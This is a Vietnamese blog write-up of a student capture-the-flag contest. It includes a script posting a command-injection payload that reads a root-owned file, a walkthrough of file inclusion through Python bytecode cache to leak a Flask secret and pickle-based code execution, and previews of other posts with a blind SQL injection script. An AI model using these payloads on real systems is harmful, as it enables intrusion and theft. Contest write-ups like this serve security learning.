KMA THI SINH VIÊN ATTT CẤP HỌC VIỆN

Hế lô ae, giải này end cũng mấy hôm rồi nhưng mà mình cũng chưa định viết writeup do còn 2 bài web nữa chưa xong :(
Nhưng mà kệ đi, dưới đây là 3 bài mình đã solve. :(

Pwn1: Welcome to KCSC

Bài này mình chỉ đăng script thôi, xin nhỗi mn :>

from pwn import *
import requests

# elf = context.binary = ELF("./advice")

pay1 = b'''Hello" && /usr/bin/as @/root/root.txt;
echo"'''
pay2 = b"111111"
# r = elf.process([pay1, pay2])
d=requests.post("http://103.162.14.116:5001/contact",data={"name":pay1,"advice":pay2})
print(d.text)
# r.interactive()


Web1: You are a good admin.

Mn có thể tải file tại đây.
Sau khi build docker xong, hãy quan sát một chút về code 
có 4 route là / /login /admin /file. Cái /tesing là mình tự thêm vào nên mn không cần để ý đâu :))


Tại route /file, ta dễ thấy nó đang bị lỗi file inclusion tại tham số f. Input chúng ta không được kết thúc là py, lý do nó ở đấy nhằm ngăn chúng ta đọc file config.py nơi chứa secret_key.
Tuy nhiên, khi chạy thì nó sẽ sinh ra một folder __pycache__ chứa file byte code .pyc.
Lợi dụng file này để đọc secret_key được import từ config.py

http://localhost:9000/file?f=../__pycache__/config.cpython-311.pyc
Ta được đoạn base64 này 


Sau đó quăng lên cyberchef là có được secret key :D
Tiếp theo là route /admin

Nhìn thấy sink để rce là chỗ pickle.loads
Bây giờ phải gen data như nào đấy để có thể thi thực lệnh.
Mình đọc được 2 bài blog nói về cách sử dụng opcode để bypass, bài 1 & bài 2. Nếu dùng __reduce__ thì sẽ sinh ra R nên không thể dùng. Mình chọn cách này

Các điều kiện đã có đủ, bây giờ gen session thôi :>
Mình sẽ dùng flask-sign để gen. 


Nhưng mà mình đếch hiểu sao nó lại outband, trên web cứ trả về lmao trong khi docker lại ghi thành công :v


Để bypass độ dài thì sửa script như này mv /f* ./c
sau đó lợi dụng lfi để đọc flag :>
Hôm nay đến đây thôi, web2 ghi sau, lười vãi đạn




Nhận xét

Đăng nhận xét

Bài đăng phổ biến từ blog này

Hình ảnh
 WolvCTF and i did my best. Hello guys, our team got rank 48th when i decide to write this writeup. I had just solved 2 web. Have no time for Other up 2,3,4 challenges btw i will do it later. Web1: Bean Cafe We need upload 2 difference images but same the md5 hash I found this drive which contain 2  image :d thx someone whose i dont know the name lmao https://drive.google.com/drive/folders/1eCcMtQkHTreAJT6JmwxG10x1HbT6prY0 Uploaded it Web2: Order Up 1  This is my script. Yeah that's all import requests import json import string a = string.printable s = "" url = "https://dyn-svc-order-up-xec3il0vccu5tn6p0q2n-okntin33tq-ul.a.run.app/query" for i in range ( 1 , 100 ):     for j in a:         data = {             "col1" : "item_name" ,             "order" : f " (case when (ascii(substr(current_query(), { i } ,1))= { ord (j) } ) then item_name else category end)"             #(case when (ascii(substr(current_database
Đọc thêm

KMACTF và nỗi buồn éo làm được gì cả T__T

Hình ảnh
hế lô ae, lại là mình đây :< Một lần nữa trong năm mình vẫn ăn hại khi solve rất ít chall trong giải của kma và cũng thx bạn X đã hỗ trợ đề cho mình Tranh thủ đợi download các bài for các thì bắt đầu với for1 :/ Đề bài như sau Mình được cho 1 file pcap :v vậy sài "cá mập trắng" để xem gói tin. chú ý và chỗ mình khoanh vùng Sắp xếp tăng dần là được,  Đọc và lọc từng kí tự thôi :/ bài này đánh giá dễ làm Web1: Mình được cho source như thế này :v Hãy cùng đi phân tích 1 chút :v Chúng ta có 2 route cần chú ý là /login và /register Các giá trị nhận đầu vào đều được tham số hóa nên sẽ không thể inject code được. Tại route /login nó sẽ kiểm tra user có === 'admin' không :v cái này thì bypass khá dễ :/ Dễ thấy nếu là Admin sẽ bypass thành công :/ Vậy chỉ còn password thôi :/ Lục lại ctf hồi trước, mọi người có thể đọc tại đây . khi ta truyền một obj password={"username":false} tức là select * from users from user where password= `username` = false mysql sẽ tự độn
Đọc thêm